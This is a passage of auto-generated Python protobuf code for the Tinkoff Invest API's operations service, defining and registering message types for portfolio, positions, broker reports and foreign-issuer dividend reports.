full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='generate_div_foreign_issuer_report_response', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerResponse.generate_div_foreign_issuer_report_response', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='div_foreign_issuer_report', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerResponse.div_foreign_issuer_report', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='payload', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerResponse.payload',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=5587,
serialized_end=5891,
)
_GENERATEDIVIDENDSFOREIGNISSUERREPORTREQUEST = _descriptor.Descriptor(
name='GenerateDividendsForeignIssuerReportRequest',
full_name='tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='account_id', full_name='tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportRequest.account_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='from', full_name='tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportRequest.from', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='to', full_name='tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportRequest.to', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5894,
serialized_end=6041,
)
_GETDIVIDENDSFOREIGNISSUERREPORTREQUEST = _descriptor.Descriptor(
name='GetDividendsForeignIssuerReportRequest',
full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='task_id', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportRequest.task_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='page', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportRequest.page', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6043,
serialized_end=6114,
)
_GENERATEDIVIDENDSFOREIGNISSUERREPORTRESPONSE = _descriptor.Descriptor(
name='GenerateDividendsForeignIssuerReportResponse',
full_name='tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='task_id', full_name='tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportResponse.task_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6116,
serialized_end=6179,
)
_GETDIVIDENDSFOREIGNISSUERREPORTRESPONSE = _descriptor.Descriptor(
name='GetDividendsForeignIssuerReportResponse',
full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='dividends_foreign_issuer_report', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportResponse.dividends_foreign_issuer_report', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='itemsCount', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportResponse.itemsCount', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pagesCount', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportResponse.pagesCount', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='page', full_name='tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportResponse.page', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6182,
serialized_end=6387,
)
_DIVIDENDSFOREIGNISSUERREPORT = _descriptor.Descriptor(
name='DividendsForeignIssuerReport',
full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='record_date', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.record_date', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='payment_date', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.payment_date', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='security_name', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.security_name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='isin', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.isin', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='issuer_country', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.issuer_country', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quantity', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.quantity', index=5,
number=6, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dividend', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.dividend', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='external_commission', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.external_commission', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dividend_gross', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.dividend_gross', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tax', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.tax', index=9,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dividend_amount', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.dividend_amount', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='currency', full_name='tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport.currency', index=11,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6390,
serialized_end=6975,
)
_OPERATIONSREQUEST.fields_by_name['from'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_OPERATIONSREQUEST.fields_by_name['to'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_OPERATIONSREQUEST.fields_by_name['state'].enum_type = _OPERATIONSTATE
_OPERATIONSRESPONSE.fields_by_name['operations'].message_type = _OPERATION
_OPERATION.fields_by_name['payment'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_OPERATION.fields_by_name['price'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_OPERATION.fields_by_name['state'].enum_type = _OPERATIONSTATE
_OPERATION.fields_by_name['date'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_OPERATION.fields_by_name['operation_type'].enum_type = _OPERATIONTYPE
_OPERATION.fields_by_name['trades'].message_type = _OPERATIONTRADE
_OPERATIONTRADE.fields_by_name['date_time'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_OPERATIONTRADE.fields_by_name['price'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIORESPONSE.fields_by_name['total_amount_shares'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIORESPONSE.fields_by_name['total_amount_bonds'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIORESPONSE.fields_by_name['total_amount_etf'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIORESPONSE.fields_by_name['total_amount_currencies'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIORESPONSE.fields_by_name['total_amount_futures'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIORESPONSE.fields_by_name['expected_yield'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_PORTFOLIORESPONSE.fields_by_name['positions'].message_type = _PORTFOLIOPOSITION
_POSITIONSRESPONSE.fields_by_name['money'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_POSITIONSRESPONSE.fields_by_name['blocked'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_POSITIONSRESPONSE.fields_by_name['securities'].message_type = _POSITIONSSECURITIES
_POSITIONSRESPONSE.fields_by_name['futures'].message_type = _POSITIONSFUTURES
_WITHDRAWLIMITSRESPONSE.fields_by_name['money'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_WITHDRAWLIMITSRESPONSE.fields_by_name['blocked'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_WITHDRAWLIMITSRESPONSE.fields_by_name['blocked_guarantee'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIOPOSITION.fields_by_name['quantity'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_PORTFOLIOPOSITION.fields_by_name['average_position_price'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIOPOSITION.fields_by_name['expected_yield'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_PORTFOLIOPOSITION.fields_by_name['current_nkd'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIOPOSITION.fields_by_name['average_position_price_pt'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_PORTFOLIOPOSITION.fields_by_name['current_price'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIOPOSITION.fields_by_name['average_position_price_fifo'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_PORTFOLIOPOSITION.fields_by_name['quantity_lots'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_BROKERREPORTREQUEST.fields_by_name['generate_broker_report_request'].message_type = _GENERATEBROKERREPORTREQUEST
_BROKERREPORTREQUEST.fields_by_name['get_broker_report_request'].message_type = _GETBROKERREPORTREQUEST
_BROKERREPORTREQUEST.oneofs_by_name['payload'].fields.append(
_BROKERREPORTREQUEST.fields_by_name['generate_broker_report_request'])
_BROKERREPORTREQUEST.fields_by_name['generate_broker_report_request'].containing_oneof = _BROKERREPORTREQUEST.oneofs_by_name['payload']
_BROKERREPORTREQUEST.oneofs_by_name['payload'].fields.append(
_BROKERREPORTREQUEST.fields_by_name['get_broker_report_request'])
_BROKERREPORTREQUEST.fields_by_name['get_broker_report_request'].containing_oneof = _BROKERREPORTREQUEST.oneofs_by_name['payload']
_BROKERREPORTRESPONSE.fields_by_name['generate_broker_report_response'].message_type = _GENERATEBROKERREPORTRESPONSE
_BROKERREPORTRESPONSE.fields_by_name['get_broker_report_response'].message_type = _GETBROKERREPORTRESPONSE
_BROKERREPORTRESPONSE.oneofs_by_name['payload'].fields.append(
_BROKERREPORTRESPONSE.fields_by_name['generate_broker_report_response'])
_BROKERREPORTRESPONSE.fields_by_name['generate_broker_report_response'].containing_oneof = _BROKERREPORTRESPONSE.oneofs_by_name['payload']
_BROKERREPORTRESPONSE.oneofs_by_name['payload'].fields.append(
_BROKERREPORTRESPONSE.fields_by_name['get_broker_report_response'])
_BROKERREPORTRESPONSE.fields_by_name['get_broker_report_response'].containing_oneof = _BROKERREPORTRESPONSE.oneofs_by_name['payload']
_GENERATEBROKERREPORTREQUEST.fields_by_name['from'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_GENERATEBROKERREPORTREQUEST.fields_by_name['to'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_GETBROKERREPORTRESPONSE.fields_by_name['broker_report'].message_type = _BROKERREPORT
_BROKERREPORT.fields_by_name['trade_datetime'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_BROKERREPORT.fields_by_name['price'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_BROKERREPORT.fields_by_name['order_amount'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_BROKERREPORT.fields_by_name['aci_value'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_BROKERREPORT.fields_by_name['total_order_amount'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_BROKERREPORT.fields_by_name['broker_commission'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_BROKERREPORT.fields_by_name['exchange_commission'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_BROKERREPORT.fields_by_name['exchange_clearing_commission'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._MONEYVALUE
_BROKERREPORT.fields_by_name['repo_rate'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_BROKERREPORT.fields_by_name['clear_value_date'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_BROKERREPORT.fields_by_name['sec_value_date'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_GETDIVIDENDSFOREIGNISSUERREQUEST.fields_by_name['generate_div_foreign_issuer_report'].message_type = _GENERATEDIVIDENDSFOREIGNISSUERREPORTREQUEST
_GETDIVIDENDSFOREIGNISSUERREQUEST.fields_by_name['get_div_foreign_issuer_report'].message_type = _GETDIVIDENDSFOREIGNISSUERREPORTREQUEST
_GETDIVIDENDSFOREIGNISSUERREQUEST.oneofs_by_name['payload'].fields.append(
_GETDIVIDENDSFOREIGNISSUERREQUEST.fields_by_name['generate_div_foreign_issuer_report'])
_GETDIVIDENDSFOREIGNISSUERREQUEST.fields_by_name['generate_div_foreign_issuer_report'].containing_oneof = _GETDIVIDENDSFOREIGNISSUERREQUEST.oneofs_by_name['payload']
_GETDIVIDENDSFOREIGNISSUERREQUEST.oneofs_by_name['payload'].fields.append(
_GETDIVIDENDSFOREIGNISSUERREQUEST.fields_by_name['get_div_foreign_issuer_report'])
_GETDIVIDENDSFOREIGNISSUERREQUEST.fields_by_name['get_div_foreign_issuer_report'].containing_oneof = _GETDIVIDENDSFOREIGNISSUERREQUEST.oneofs_by_name['payload']
_GETDIVIDENDSFOREIGNISSUERRESPONSE.fields_by_name['generate_div_foreign_issuer_report_response'].message_type = _GENERATEDIVIDENDSFOREIGNISSUERREPORTRESPONSE
_GETDIVIDENDSFOREIGNISSUERRESPONSE.fields_by_name['div_foreign_issuer_report'].message_type = _GETDIVIDENDSFOREIGNISSUERREPORTRESPONSE
_GETDIVIDENDSFOREIGNISSUERRESPONSE.oneofs_by_name['payload'].fields.append(
_GETDIVIDENDSFOREIGNISSUERRESPONSE.fields_by_name['generate_div_foreign_issuer_report_response'])
_GETDIVIDENDSFOREIGNISSUERRESPONSE.fields_by_name['generate_div_foreign_issuer_report_response'].containing_oneof = _GETDIVIDENDSFOREIGNISSUERRESPONSE.oneofs_by_name['payload']
_GETDIVIDENDSFOREIGNISSUERRESPONSE.oneofs_by_name['payload'].fields.append(
_GETDIVIDENDSFOREIGNISSUERRESPONSE.fields_by_name['div_foreign_issuer_report'])
_GETDIVIDENDSFOREIGNISSUERRESPONSE.fields_by_name['div_foreign_issuer_report'].containing_oneof = _GETDIVIDENDSFOREIGNISSUERRESPONSE.oneofs_by_name['payload']
_GENERATEDIVIDENDSFOREIGNISSUERREPORTREQUEST.fields_by_name['from'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_GENERATEDIVIDENDSFOREIGNISSUERREPORTREQUEST.fields_by_name['to'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_GETDIVIDENDSFOREIGNISSUERREPORTRESPONSE.fields_by_name['dividends_foreign_issuer_report'].message_type = _DIVIDENDSFOREIGNISSUERREPORT
_DIVIDENDSFOREIGNISSUERREPORT.fields_by_name['record_date'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_DIVIDENDSFOREIGNISSUERREPORT.fields_by_name['payment_date'].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_DIVIDENDSFOREIGNISSUERREPORT.fields_by_name['dividend'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_DIVIDENDSFOREIGNISSUERREPORT.fields_by_name['external_commission'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_DIVIDENDSFOREIGNISSUERREPORT.fields_by_name['dividend_gross'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_DIVIDENDSFOREIGNISSUERREPORT.fields_by_name['tax'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
_DIVIDENDSFOREIGNISSUERREPORT.fields_by_name['dividend_amount'].message_type = tinkoff_dot_invest_dot_grpc_dot_common__pb2._QUOTATION
DESCRIPTOR.message_types_by_name['OperationsRequest'] = _OPERATIONSREQUEST
DESCRIPTOR.message_types_by_name['OperationsResponse'] = _OPERATIONSRESPONSE
DESCRIPTOR.message_types_by_name['Operation'] = _OPERATION
DESCRIPTOR.message_types_by_name['OperationTrade'] = _OPERATIONTRADE
DESCRIPTOR.message_types_by_name['PortfolioRequest'] = _PORTFOLIOREQUEST
DESCRIPTOR.message_types_by_name['PortfolioResponse'] = _PORTFOLIORESPONSE
DESCRIPTOR.message_types_by_name['PositionsRequest'] = _POSITIONSREQUEST
DESCRIPTOR.message_types_by_name['PositionsResponse'] = _POSITIONSRESPONSE
DESCRIPTOR.message_types_by_name['WithdrawLimitsRequest'] = _WITHDRAWLIMITSREQUEST
DESCRIPTOR.message_types_by_name['WithdrawLimitsResponse'] = _WITHDRAWLIMITSRESPONSE
DESCRIPTOR.message_types_by_name['PortfolioPosition'] = _PORTFOLIOPOSITION
DESCRIPTOR.message_types_by_name['PositionsSecurities'] = _POSITIONSSECURITIES
DESCRIPTOR.message_types_by_name['PositionsFutures'] = _POSITIONSFUTURES
DESCRIPTOR.message_types_by_name['BrokerReportRequest'] = _BROKERREPORTREQUEST
DESCRIPTOR.message_types_by_name['BrokerReportResponse'] = _BROKERREPORTRESPONSE
DESCRIPTOR.message_types_by_name['GenerateBrokerReportRequest'] = _GENERATEBROKERREPORTREQUEST
DESCRIPTOR.message_types_by_name['GenerateBrokerReportResponse'] = _GENERATEBROKERREPORTRESPONSE
DESCRIPTOR.message_types_by_name['GetBrokerReportRequest'] = _GETBROKERREPORTREQUEST
DESCRIPTOR.message_types_by_name['GetBrokerReportResponse'] = _GETBROKERREPORTRESPONSE
DESCRIPTOR.message_types_by_name['BrokerReport'] = _BROKERREPORT
DESCRIPTOR.message_types_by_name['GetDividendsForeignIssuerRequest'] = _GETDIVIDENDSFOREIGNISSUERREQUEST
DESCRIPTOR.message_types_by_name['GetDividendsForeignIssuerResponse'] = _GETDIVIDENDSFOREIGNISSUERRESPONSE
DESCRIPTOR.message_types_by_name['GenerateDividendsForeignIssuerReportRequest'] = _GENERATEDIVIDENDSFOREIGNISSUERREPORTREQUEST
DESCRIPTOR.message_types_by_name['GetDividendsForeignIssuerReportRequest'] = _GETDIVIDENDSFOREIGNISSUERREPORTREQUEST
DESCRIPTOR.message_types_by_name['GenerateDividendsForeignIssuerReportResponse'] = _GENERATEDIVIDENDSFOREIGNISSUERREPORTRESPONSE
DESCRIPTOR.message_types_by_name['GetDividendsForeignIssuerReportResponse'] = _GETDIVIDENDSFOREIGNISSUERREPORTRESPONSE
DESCRIPTOR.message_types_by_name['DividendsForeignIssuerReport'] = _DIVIDENDSFOREIGNISSUERREPORT
DESCRIPTOR.enum_types_by_name['OperationState'] = _OPERATIONSTATE
DESCRIPTOR.enum_types_by_name['OperationType'] = _OPERATIONTYPE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
OperationsRequest = _reflection.GeneratedProtocolMessageType('OperationsRequest', (_message.Message,), {
'DESCRIPTOR' : _OPERATIONSREQUEST,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.OperationsRequest)
})
_sym_db.RegisterMessage(OperationsRequest)
OperationsResponse = _reflection.GeneratedProtocolMessageType('OperationsResponse', (_message.Message,), {
'DESCRIPTOR' : _OPERATIONSRESPONSE,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.OperationsResponse)
})
_sym_db.RegisterMessage(OperationsResponse)
Operation = _reflection.GeneratedProtocolMessageType('Operation', (_message.Message,), {
'DESCRIPTOR' : _OPERATION,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.Operation)
})
_sym_db.RegisterMessage(Operation)
OperationTrade = _reflection.GeneratedProtocolMessageType('OperationTrade', (_message.Message,), {
'DESCRIPTOR' : _OPERATIONTRADE,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.OperationTrade)
})
_sym_db.RegisterMessage(OperationTrade)
PortfolioRequest = _reflection.GeneratedProtocolMessageType('PortfolioRequest', (_message.Message,), {
'DESCRIPTOR' : _PORTFOLIOREQUEST,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.PortfolioRequest)
})
_sym_db.RegisterMessage(PortfolioRequest)
PortfolioResponse = _reflection.GeneratedProtocolMessageType('PortfolioResponse', (_message.Message,), {
'DESCRIPTOR' : _PORTFOLIORESPONSE,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.PortfolioResponse)
})
_sym_db.RegisterMessage(PortfolioResponse)
PositionsRequest = _reflection.GeneratedProtocolMessageType('PositionsRequest', (_message.Message,), {
'DESCRIPTOR' : _POSITIONSREQUEST,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.PositionsRequest)
})
_sym_db.RegisterMessage(PositionsRequest)
PositionsResponse = _reflection.GeneratedProtocolMessageType('PositionsResponse', (_message.Message,), {
'DESCRIPTOR' : _POSITIONSRESPONSE,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.PositionsResponse)
})
_sym_db.RegisterMessage(PositionsResponse)
WithdrawLimitsRequest = _reflection.GeneratedProtocolMessageType('WithdrawLimitsRequest', (_message.Message,), {
'DESCRIPTOR' : _WITHDRAWLIMITSREQUEST,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.WithdrawLimitsRequest)
})
_sym_db.RegisterMessage(WithdrawLimitsRequest)
WithdrawLimitsResponse = _reflection.GeneratedProtocolMessageType('WithdrawLimitsResponse', (_message.Message,), {
'DESCRIPTOR' : _WITHDRAWLIMITSRESPONSE,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
# @@protoc_insertion_point(class_scope:tinkoff.public.invest.api.contract.v1.WithdrawLimitsResponse)
})
_sym_db.RegisterMessage(WithdrawLimitsResponse)
PortfolioPosition = _reflection.GeneratedProtocolMessageType('PortfolioPosition', (_message.Message,), {
'DESCRIPTOR' : _PORTFOLIOPOSITION,
'__module__' : 'tinkoff.invest.grpc.operations_pb2'
